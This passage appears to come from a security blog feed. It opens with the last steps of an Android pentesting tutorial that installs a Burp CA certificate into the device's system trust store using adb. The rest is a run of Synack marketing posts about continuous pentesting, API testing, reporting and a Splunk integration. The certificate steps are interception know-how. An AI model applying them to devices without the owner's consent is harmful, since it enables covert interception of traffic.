adb remount 

now open adb shell, goto sdcard

cd sdcard 

Now move the file to  /system/etc/security/cacerts

mv 9a5ba575.0 /system/etc/security/cacerts/

Now, In the device Settings, Security, Encryption, and Trusted Credentials, you will see PortSwigger's CA certificate.

Conclusion

Android application penetration testing is a broader topic and cannot be covered in a single blog post, and we have to discuss many android pentesting frameworks. We will be publishing several blog posts to cover all of them.

Test to Find the Exploitable Vulnerabilities and Their Root Causes

Vulnerability Management in Your Cybersecurity Program

Today’s complex software systems often include code that leaves them vulnerable to attack by hackers who are always looking for a way to break in. And even with a system with no inherent vulnerabilities, a misconfiguration or careless deployment of credentials handling can afford hackers an opportunity for infiltration. A record 26,448 software security flaws were reported in 2022, with the number of critical vulnerabilities up 59% on 2021. So a good cybersecurity program should include a program for vulnerability management.

Tactical vs. Strategic Penetration Testing in Vulnerability Management

Vulnerability management is the process of identifying and remediating weaknesses in your systems, including your applications, infrastructure and security processes. And a key component of that program should be penetration testing, actively probing your system to identify vulnerabilities so they can be analyzed, prioritized and remediated.

As companies move to agile models for software development, the release of new features or products becomes more frequent. And that code can introduce vulnerabilities. Similarly, more systems are being deployed in the cloud. And cloud assets can fall out of compliance or become susceptible to attacks after a single update.

Traditionally, pentesting has been performed on a tactical, one-time basis. But the most thorough penetration test, even if repeated periodically, is only a snapshot in time. While one-time pentesting can be an essential part of any vulnerability management program, this tactical approach is most appropriate for obtaining a picture of your security posture. Identify your vulnerabilities and address them as needed. It is also useful in testing for and proving compliance in regard to security standards such as OWASP, PCI and NIST.

Comprehensive cybersecurity requires more strategic thinking, going beyond the concept of a snapshot. You need to leverage test results for operational purposes, track changes over time, understand performance across the organization, analyze root cause, and communicate your security posture. And to accomplish this you need to have a program of continuous pentesting like those available through Synack. Synack can pentest agile development output at multiple stages of development and assist developer and QA teams with quick remediation through real-time reporting and patch verification. Continuous testing is also best for cloud assets. To facilitate cloud security testing, Synack has integrations with AWS, Azure and GCP that enable detection of changes that could cause problems.

For strategic vulnerability management Synack provides continuous pentesting in 90- and 365-day increments (Synack90 and Synack365) to address a wide range of use cases. Both programs help you catch vulnerabilities as they are introduced, and track your security posture across the organization and over time.

Automated Scanning and Pentesting: A One-Two Punch For Identifying and Remediating Vulnerabilities

Two of the tools in the Synack platform, whether they are deployed tactically or strategically, that provide an effective one-two punch for identifying and remediating exploitable vulnerabilities are Synack SmartScan and Synack’s transformational penetration testing. Deploying these two tools can help you cut through the noise, taking automated vulnerability testing results and applying human intelligence to improve the vulnerability management workflow. You can address the problems that really matter.

Deploy SmartScan for Low-Importance Assets

Vulnerability scanning is most appropriate for low-importance assets. Traditional vulnerability scanners are good at identifying known vulnerabilities. But they typically treat all assets the same and are not able to distinguish exploitable vulnerabilities from the noise. They require expert reviews and triage. Synack SmartScan takes the scanning idea to another level. SmartScan is an automated set of scanning tools that continuously watch for changes in your environment to identify and triage security vulnerabilities. SmartScan identifies potential vulnerabilities and engages the Synack Red Team (SRT) to evaluate the results. The SRT along with Synack Operations generates a vulnerability report, including steps to reproduce and remediate the vulnerability. SmartScan enables rather than burdening your security and operations teams.

Deploy Pentesting for High-Importance Assets

Pentesting gives you the more accurate and complete vulnerability information that high-importance assets require. To pentest your organization Synack calls on a vetted community of security researchers to actively probe your assets for exploitable vulnerabilities, much like a hacker would. You get top-tier talent to find and fix exploitable vulnerabilities, and confirm remediation efforts across your external attack surface.

Deploy Synack Stand-Alone or in Partnership with Other Security Platforms

With Synack’s flexibility, you can integrate automated scanning and pentesting into your existing workflow, or deploy them as a new process. Either way you get comprehensive end-to-end offensive testing, taking you from discovery through to remediation. And Synack tools can be deployed as an add-on to larger security systems such as Splunk’s data platform or Microsoft’s Sentinel security information and event manager (SIEM).

Learn How Synack Can Help Protect Your Organization

For the most comprehensive vulnerability management, deploy continuous scanning and pentesting to help you identify and remediate vulnerabilities across your entire asset base.

The post How to Deploy Strategic Pentesting in Your Vulnerability Management Program appeared first on Synack.

API (application programming interface) cybersecurity isn’t as thorough as it needs to be. When it comes to pentesting, web APIs are often lumped in with web applications, despite 90% of web applications having a larger attack surface exposed via APIs than user interfaces, according to Gartner. However, that kind of testing doesn’t cover the full spectrum of APIs, potentially leaving vulnerabilities undiscovered. As APIs become both increasingly important and increasingly vulnerable, it’s more important than ever to keep your APIs secure.

APIs vs. Web Applications

APIs are how software programs talk to each other. APIs are interfaces that allow software programs to transmit data to other software programs. Integrating applications via APIs allows one piece of software to access and use the capabilities of another. In today’s increasingly connected digital world, it’s no surprise that APIs are becoming more and more prevalent.

When most people think of APIs, what they’re really thinking about are APIs  exposed via a web application UI, usually by means of an HTTP-based web server. A web application is any application program that is stored remotely and delivered via the internet through a browser interface. 

APIs, however, connect and power everything from mobile applications, to cloud-based services, to internal applications, partner platforms and more. An organization’s APIs may be more numerous than those that can be enumerated through browsing a web application.

Differences in Pentesting

Frequently, organizations that perform pentesting on their web applications assume that a clean bill of health for web applications means that their APIs are just as secure. Unfortunately, that isn’t the case. An effective API security testing strategy requires understanding the differences between web application testing and API security testing. 

Web application security mostly focuses on threats like injection attacks, cross-site scripting and buffer overflows. Meanwhile, API breaches typically occur through issues with authorization and authentication, which lets cyber attackers get access to business logic or data.

Web application pentesting isn’t sufficient for testing APIs. Web application testing usually only covers the API calls made by the application, though APIs have a much broader range of functioning than that.

To begin a web application pentest, you provide your pentesters with a list of and they test all of the fields associated with these URLs. Some of these fields will have APIs behind them, allowing them to communicate with something. If the pentesters find a vulnerability here, that’s an API vulnerability – and that kind of API vulnerability will be caught. However, any APIs that aren’t connected to a field won’t be tested.

Most organizations have more APIs than just the ones attached to web application fields. Any time an application needs to talk to another application or to a database, that’s an API that might still be vulnerable. While a web application pentest won’t be able to test these APIs, an API pentest will.

The Importance of API Pentesting

Unlike web applications, APIs have direct access to endpoints, and cyber attackers can manipulate the data that these endpoints accept. So, it’s important to make sure that your APIs are just as thoroughly tested as your web applications. By performing separate pentesting for APIs and web applications, you make sure that you have your attack surface covered.

Synack can help. To learn more about the importance of pentesting for APIs, read this white paper and visit our API security solution page.

The post Don’t Let API Penetration Testing Fall Through the Cracks appeared first on Synack.

In your cybersecurity practice, do you ever worry that you’ve left your back door open and an intruder might sneak inside? If you answered yes, you’re not alone. The experience can be a common one, especially for security leaders of large organizations with multiple layers of tech and cross-team collaboration to accomplish live, continuous security workflows.

At Synack, the better way to pentest is one that’s always on, can scale to test for urgent vulnerabilities or compliance needs, and provides transparent, thorough reporting and coverage insight.

Know what’s being tested, where it’s happening and how often it’s occurring 

With Synack365, our Premier Security Testing Platform, you can find relief in the fact that we’re always checking for unlocked doors. To provide better testing oversight, we maintain reports that list all web assets being tested, which our customers have praised. Customer feedback indicated that adding continuous oversight into host assets would also help to know which host or web assets are being tested, when and where they’re being tested, and how much testing has occurred. 

Synack’s expanded Coverage Analytics tells you all that and more for host assets, in addition to our previous coverage details on web applications and API endpoints, all found within the Synack platform. With Coverage Analytics, Synack customers are able to identify which web or host assets have been tested and the nature of the testing performed. This is helpful for auditing purposes and provides proof of testing activity, not just that an asset is in scope. Additionally, Coverage Analytics gives customers an understanding of areas that haven’t been tested as heavily for vulnerabilities and can provide internal red team leaders with direction for supplemental testing and prioritization. 

Unmatched Oversight of Coverage 

Other forms of security testing are unable to provide the details and information Synack Coverage Analytics does. Bug bounty testing typically goes through the untraceable public internet or via tagged headers, which require security researcher cooperation. The number of researchers and hours that they are testing are not easily trackable via these methods, if at all. Traditional penetration testing doesn’t have direct measurement capabilities. Our LaunchPoint infrastructure stands between the Synack Red Team, our community of 1,500 security researchers, and customer assets, so customers have better visibility of the measurable traffic during a test. More and more frequently, we hear that customers are required to provide this kind of information to their auditors in financial services and other industries. 

A look at the Classified Traffic & Vulnerabilities view in Synack’s Coverage Analytics. Sample data has been used for illustration purposes.

Benefits of Coverage Analytics 

• Know what’s being tested within your web and host assets: where, when and how much 
• View the traffic generated by the Synack Red Team during pentesting
• Take next steps with confidence; identify where you may need supplemental testing and how to prioritize such testing

Starting today, security leaders can reduce their teams’ fears of pentesting in the dark by knowing what’s being tested, where and how much at any time across both web and host assets. Coverage Analytics makes sharing findings with executive leaders, board members or auditors simple and painless.

Current Synack customers can log in to the Synack Platform to explore Coverage Analytics today. If you have questions or are interested in learning more about Coverage Analytics, part of Synack’s Better Way to Pentest, don’t hesitate to contact us today!

The post Worry-free Pentesting: Continuous Oversight In Offensive Security Testing appeared first on Synack.

Reporting is a critical but often-overlooked component of cybersecurity testing

The overall goals of nearly any technology can be summed up by the title of a song by the popular French music duo Daft Punk: “Harder, Better, Faster, Stronger.” New technologies are commonly judged against two or more of these characteristics. Applying this to cybersecurity tools, does it harden my attack resistance? Can it do the job better with less cost or resources? Does it do the job faster? And ultimately are my defenses stronger?

But in the urgency to design and implement the features that will achieve these goals, there is one component that is often overlooked. Reporting. Can I get the right information into the hands of the right people in a form that they can use?   

Original cybersecurity pentest reports were descriptions of what was done, what was found and what might be done about it. They were composed for the security team paying for the test and were usually in the form of a data dump. Three or four hundred page reports were commonplace, and why not? What better way to show all the work that you have done, even if the pentests didn’t actually produce any viable results.  

Further, those reports were created once for each pentest resulting in a fossilized memento of what was done, usually destined to occupy a few MB of storage on a hard drive, and eventually forgotten in an archive.

Synack decided there had to be a better way to communicate pentesting results. They focused on three key innovations: customizability, scheduling and human components.

Customizability:

In this information age, too much information can be as punishing or painful as too little. Not everyone cares about every component of a pentest. For example, a painstaking regurgitation of the scope of the test may matter to an auditor, but not a developer tasked with patching found vulnerabilities. Synack reports are highly customizable, allowing for purpose-built, audience-customized reports to be created on the fly. Each person can get the report they need, without unnecessary information. And this sort of reporting uses less resources than generating a single report for everyone. 

Scheduling:

People throughout an organization have different appetites for information. We’ve seen organizations that want weekly reports on Continuous tests, but only for host and network assets. Others want a fresh report every time their web app has a new feature ship, coinciding with the 14-day sprint schedule that drives their CI/CD. Synack can handle all of those scenarios with reporting customization AND a robust role-based access control (RBAC) system. Synack’s RBAC customizable reporting also allows security teams to implement Least Privilege Access so various information needs can be met without the risk of testing data being seen or modified accidentally or by anyone without proper authorization. So testing results get in peoples’ hands without delay.

Human Components:

The most important question you need to ask about any cybersecurity test is, “Why do I care and what do I need to do?” Ultimately, with the thousands of discrete tests performed and vulnerabilities found, Synack decided that a human-written summary was usually what helped customers the most. Every Synack pentest comes with a human-written summary, written by people separate from the actual testing, triage or service delivery to gain maximum benefits from independent thinking. Customers get the actionable information they need to strengthen their cybersecurity defenses. And they get it in a form that is to the point and easy for them to digest.

To see our reporting feature in action, watch this short video.

The post Reporting Can Be the Hero or Villain of Your Cybersecurity Pentesting appeared first on Synack.

Wade Lance is the Field CISO for Synack.

Are you more secure this quarter than last quarter? Are members of your team learning and getting better? Are you finding deficiencies in your cybersecurity program and fixing them – or are you just swimming along from patch to patch, hoping for the best?

These tough questions are driving many organizations to overhaul their approach to security testing. It’s easy to argue a given security initiative reduces risk. The board is now demanding that you prove it.

Traditional security testing tends to be coin-operated: Perhaps you schedule a one-off pentest, find a vulnerability, fix it, report it to regulators if needed– end of story. There’s no attempt to actually learn about your overall security posture or change your long-term risk level.

Through our Synack Platform, you can review metrics that show the root causes of your security risks, giving you the tools and information to demonstrate to management that you’re actually solving problems. It’s a transformational approach that delivers the kind of information security leadership is demanding.

No more whack-a-mole

In one recent case, we tested a customer across an entire year. About 80% of the vulnerabilities we found over that timeframe had to do with authentication weaknesses. Yes, we’re going to keep finding the flaws and yes, members of our elite Synack Red Team of security researchers can keep validating they’re successfully patched.

Finding and fixing bugs is all fine and good. But if you keep seeing fruit flies in your house, shouldn’t you try to find the source rather than brushing them away one by one?

It was clear that this particular organization needed to boost its developers’ understanding of secure authentication practices so they could stop introducing new vulnerabilities. That deeper insight into authentication problems wouldn’t have emerged from piecemeal security testing aimed solely at ticking checkboxes for compliance.

Our Platform isn’t just about tactical advantages of tapping into a global network of 1,500-plus diverse, vetted security pros. Of course, we believe diverse perspectives in security testing are essential to hardening systems against the full spectrum of cyberthreats. But the Platform is also about offering customers adversarial testing that shows patterns and trends, so CISOs or security leadership have answers when the board comes knocking. That’s a game changer in today’s security landscape.

At Synack, we use transformational security testing to:

• Identify security process and posture weaknesses
• Track improvement in those conditions over time
• Communicate that risk reduction to senior leadership

Yes, we can augment your operational teams with scalable pentests, succinct (and fast) reporting and surge capacity for emergencies like the Log4j vulnerability. But we can also bring the receipts needed to document your security journey and show progress to executives. You won’t get that from traditional testing.

To learn more about the strategic value of the Synack Platform, book a demo or contact us here.

The post Leveling Up Your Security Strategy with the Synack Platform appeared first on Synack.

Working Together to Provide Comprehensive Cybersecurity

Protecting Your Organization from Cybercrime

You already know that you need to be proactive regarding cybersecurity to protect your organization’s information and your resources. In 2020 cybercrime cost organizations an average of $4.35 million, and it took 277 days to find and contain the attack. But what’s the best way to mitigate against your organization falling prey to an attack? There are a number of different types of cybersecurity tools available with more being announced seemingly every day. VC funding for cybersecurity startups reached a record high of $29.5 billion in 2021 and there have been 300+ new startups every year. With this assortment of tools at your disposal, which ones should you deploy? 

One way to proceed is to select tools that complement each other. For example, deploying pentesting for breadth of vulnerability test coverage works hand in hand with red teaming for more targeted testing of specific assets or problem areas. Another complementary pairing is pentesting with asset discovery and management. In this article, we’ll take a look at how penetration testing can use the information from asset discovery and management tools to make sure you are testing everything you need to test and provide you with comprehensive cybersecurity protection.

Asset Discovery and Management

Pentesting will provide you with actionable knowledge of how a cyber attacker can hack into your organization and what damage that attack can cause. But before diving into pentesting it’s important to have a picture of your organization’s external attack surface and an assessment of its known vulnerabilities. 

Determining Potential Attack Points with External Attack Surface Management (EASM)

EASM is at the forefront of Gartner’s Top Security and Risk Management Trends for 2022. Broadly defined EASM is the process of identifying, inventorying and assessing your organization’s IT assets including all external-facing internet assets and systems. And with the increasing use of cloud resources, your attack surface is expanding rapidly. Forty-three percent of IT and business leaders state that the attack surface is spiraling out of control, and nearly three-quarters are concerned with the size of their digital attack surface. Having a good EASM process will provide your pentesters with a map of where all of your assets are, whether they are internal or external, so they can better determine how to mount as all-inclusive a test as possible.

Identifying and Managing Your Vulnerabilities

A vulnerability scan can identify gaps in your security controls and find security loopholes in your software infrastructure. These scans are optimized for breadth and completeness of coverage with the goal of ensuring that no vulnerabilities are missed. A vulnerability assessment will check for security issues such as misconfigurations, unchecked or incorrect privileges, excessive services and missing operating system updates. You can then prioritize the exposed vulnerabilities according to how likely they are to be exploited in your organization and how much damage can be caused by a hacker exploiting them. 

Putting It All Together

EASM, vulnerability management and penetration tests complement each other but have different goals. The first step in determining your organization’s vulnerability to cyberattack is to do an EASM study. EASM results helps you see what all of your potential attack points are. It’s not uncommon for an EASM study to expose assets and points of potential attack an organization didn’t even know they had. 

Using the EASM results you can perform a vulnerability assessment to expose any known vulnerabilities associated with those assets. The vulnerability scan and prioritization will tell you what your known vulnerabilities are. Usually these vulnerabilities are already known to the security community, hackers, and software vendors. These scans normally don’t uncover unknown vulnerabilities.

With an EASM and vulnerability results in hand you can then perform a penetration test.  Where vulnerability scans are optimized for depth and completeness, penetration tests are optimized for depth and thoroughness. Pentests will search for all potential attack points and actively exploit all detected known and as yet unknown vulnerabilities to determine if unauthorized access or malicious activity is possible. Then a good pentesting operation will prioritize its results and assist in remediation or mitigation of detected problems.

Using these three cybersecurity tools and processes will help you answer these important questions:

• What do we have that might be attacked? (EASM)
• Could an attack happen on things we own and how likely is it that something will happen to us? (Vulnerability Assessment and Management)
• What can happen if an attacker gets into our system? (Pentesting)

The post Pentesting and Asset Discovery & Management: Symbiotic Benefit of Complementary Cybersecurity Tools appeared first on Synack.

An astounding 82% of organizations believe they have experienced at least one data breach due to digital transformation, according to a recent survey. Fast paced cloud migrations have created new risks and challenges that require continuous monitoring of your digital assets. Attackers are now scanning for vulnerable endpoints within 15 minutes. Zero day vulnerabilities like Log4j are more frequent and difficult to address. Though the likelihood of a breach has never been higher, security teams still may be unable to commit to a full year of security testing due to a need for flexibility in developing and implementing a continuous testing strategy.

Synack is now offering Synack90, a 90-day pentest, as a new way for organizations to make meaningful progress toward implementing a continuous pentesting strategy.

What is Synack90? 

Synack90 includes 90 days of Synack Red Team (SRT) open vulnerability discovery (OVD) penetration testing combined with the machine power of SmartScan, a scanner that sniffs out vulnerabilities. The offering also includes access to the Synack Platform for the duration of their contract, which means the ability to launch on-demand security tasks such as OSINT, zero day response and compliance checklists like NIST 800-53 or OWASP at the click of a button. 

How does Synack90 work? 

Synack provides a customer success resource that leads a kick off call. After an initial kickoff call, SRT testing and DAST scanning will kick off for a 90-day period. All SRT vulnerability reports are triaged by our Vulnerability Operations team. Synack provides reporting on actionable, exploitable vulnerabilities in real-time through the client portal, which customers can easily operationalize through the API, RBAC and ticketing integrations. Synack90 also includes patch verification for 90 days, which can drastically reduce time to remediate vulnerabilities during the testing period. 

The benefits of continuous pentesting with Synack90

Many security teams are evolving toward a continuous pentesting model. There’s a number of reasons for the shift:

• Flexibility – Synack90 can only be purchased with credits, which means it can be launched at any time in the one-year window of the contract. Additionally, any customer that has existing credits can launch a Synack90 with their credit balance without starting a new contract.  
• Cloud security – Digital transformation and new hybrid, multi-cloud environments expand and complicate your attack surface. Synack can test dynamic IPs across most major providers to make sure you are on top of any risks. 
• Discover shadow IT –  Synack also offers OSINT and threat modeling to help inform your testing plans. Attack surfaces are changing and shadow IT is a concern. Testing continuously allows you to discover risks on unknown assets before your adversaries.
• Security and compliance – Synack90 still meets regulatory requirements while providing more coverage than a 14-day pentest. For a limited time, customers can purchase a web checklist at a 50% discount and run it during the 90-day testing period for a more structured testing experience. 
• Catch exploitable vulnerabilities before attackers – Unlimited re-testing of vulnerabilities ensures that vulnerabilities actually get patched and aren’t exploited by nefarious actors.

Launch Synack90 Today 

Synack customers are interested in Synack90 for a number of reasons, including testing high priority applications, fulfilling compliance obligations, discovering the value of continuous testing, and testing cloud services. Synack is providing an extra incentive with the launch of Synack90 that includes our Digital Reconnaissance or Web Premium checklist at a 50% discount when purchased with Synack90. Interested in Synack90? Read the full data sheet or contact us. 

The post A Flexible Way to Pentest Continuously: Synack90 appeared first on Synack.

Cybersecurity officers tasked with finding and mitigating vulnerabilities in government organizations are already operating at capacity—and it’s not getting any easier.

First, the constant push for fast paced, develop-test-deploy cycles continuously introduces risk of new vulnerabilities. Then there are changes in mission at the agency level, plus competing priorities to develop while simultaneously trying to secure everything (heard of DevSecOps?). Without additional capacity, it’s difficult to find exploitable critical vulnerabilities, remediate at scale and execute human-led offensive testing of the entire attack surface. 

The traditional remedy for increased security demands has been to increase penetration testing in the tried and true fashion: hire a consulting firm or a single (and usually junior) FTE to pentest the assets that are glaring red. That method worked for most agencies, through 2007 anyway. In 2022, however, traditional methodology isn’t realistic. It doesn’t address the ongoing deficiencies in security testing capacity or capability. It’s also too slow and doesn’t scale for government agencies.

So in the face of an acute cybersecurity talent shortage, what’s a mission leader’s best option if they want to improve and expand their cybersecurity testing program, discover and mitigate vulnerabilities rapidly, and incorporate findings into their overall intelligence collection management framework? 

Security leaders should ask themselves the following questions as they look to scale their offensive and vulnerability intelligence programs:

• Do we have continuous oversight into which assets are being tested, where and how much? 
• Are we assessing vulnerabilities based on the Cybersecurity Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities Catalog, or are we assessing vulnerabilities using the Common Vulnerability Scoring System (CVSS) calculator? 
• Are we operationalizing penetration test results by integrating them into our SIEM/SOAR and security ops workflow, so we can visualize the big picture of vulnerabilities across our various assets? 
• Are we prioritizing and mitigating the most critical vulnerabilities to our mission expediently? 

There is a way to kick-start a better security testing experience—in a FedRAMP Moderate environment with a diverse community of security researchers that provide scale to support the largest of directorates with global footprints. The Synack Platform pairs the talents of the Synack Red Team, a group of elite bug hunters, with continuous scanning and reporting capabilities.

Together, this pairing empowers cybersecurity officers to know what’s being tested, where it’s happening, and how much testing is being done with vulnerability intelligence. Correlated with publicly available information (PAI) and threat intelligence feeds, the blend of insights can further enhance an agency’s offensive cybersecurity stance and improve risk reduction efforts.

Synack helps government agencies mitigate cybersecurity hiring hurdles and the talent gap by delivering the offensive workforce needed quickly and at scale to ensure compliance and reduce risk. And we’re trusted by dozens of government agencies. By adding Synack Red Team mission findings into workflows for vulnerability assessment, security operations teams are given the vulnerability data needed to make faster and more informed decisions.

Intrigued? Let’s set up an intelligent demo. If you’re attending the Intelligence & National Security Summit at the Gaylord in National Harbor, Md., next week, we’ll be there attending sessions and chatting with officers at Kiosk 124. We hope to see you there! 

Luke Luckett is Senior Product Marketing Manager at Synack.

The post Accelerated Decision-making in Cybersecurity Requires Actionable Vulnerability Intelligence appeared first on Synack.

In the cyber realm, organizations are often running their defensive and offensive security operations with little coordination.

Defensive security techniques, such as firewalls, endpoint detection and response, network access control, intrusion prevention and security information event management, detect and stop attackers. While offensive security offers a way to test the effectiveness of cyber defenses, including techniques and tools such as red teaming, penetration testing, vulnerability assessments and digital reconnaissance. Too often organizations focus on defensive security and not enough on offensive security testing.

Red Team vs. Blue Team

By design, security offense and defense teams work separately, with the red team or pentesters probing the attack surface looking for weaknesses, much like malicious hackers might. Without consistent and frequent communication between the two, the defense won’t know where to make improvements.

Security Operations Centers (SOC) focus on defensive cybersecurity. SOCs use many defensive security tools, as such they need a single pane of glass to view and correlate the data points coming from each source. Splunk Enterprise and Splunk Cloud (Splunk) are data platforms at the center of security operations that provide insights across disparate data streams to achieve end-to-end visibility for SOCs. Often missing are the results of offensive security testing into the SOC’s single pane of glass.

To combine offensive security data, Synack offers an add-on app for Splunk, allowing the SOC to view, correlate and receive alerts for the results of offensive security tests and recommended fixes to their defensive security in real time.

When information about security flaws isn’t accessible by the SOC, vulnerabilities and exploits uncovered by offensive security testing are reviewed only occasionally (e.g. in conjunction with periodic events such as yearly security compliance audits). New types of threats appear daily, so an occasional review isn’t sufficient to maintain good security posture. However, given the opportunity, Splunk’s architecture can ingest dynamic offensive security testing results and make such results actionable by security leaders.

An organization’s defenses can, and should, be tested against the latest security threats, not just the ones needed to pass a yearly compliance audit.

The Synack Integration with Splunk

Synack helps address these challenges by offering a premier security testing platform, supported by an expert, vetted community of security researchers who run continuous vulnerability assessments and deliver on-demand pentesting as new exploits emerge. The Synack Red Team (SRT)—1,500+ members strong—allows customers to take advantage of a diverse and instantly scalable security talent pool without the overhead of static headcount to accommodate surges in testing demand. Customers get offensive security testing 365 days a year with actionable reports to empower them to tackle new risks as they occur.

The Synack integration with Splunk uncovers exploitable vulnerabilities that can be correlated with network traffic, logs and other data collected by Splunk to recommend more effective security policies and rules on defensive tools (e.g. intrusion prevention systems and web application firewalls). Progress to harden an organization’s attack surface can be made by reviewing results, verifying recommendations and patching fixes (which can be verified by the SRT). The integration automates this process by facilitating continual improvement in security posture.

With the integration between Synack and Splunk, organizations can seamlessly coordinate offensive security into their SOC, enabling continuous defensive improvement in cyber security posture and protection. Splunk and Synack help all your team members work from the same playbook. 

To learn more about Synack’s premier security testing please visit our website, to learn about Splunk see their site and to access the Synack Integration with Spunk please visit the Splunkbase.

The post Splunk and Synack Partner to Bring Both a Defense and Offensive Strategy appeared first on Synack.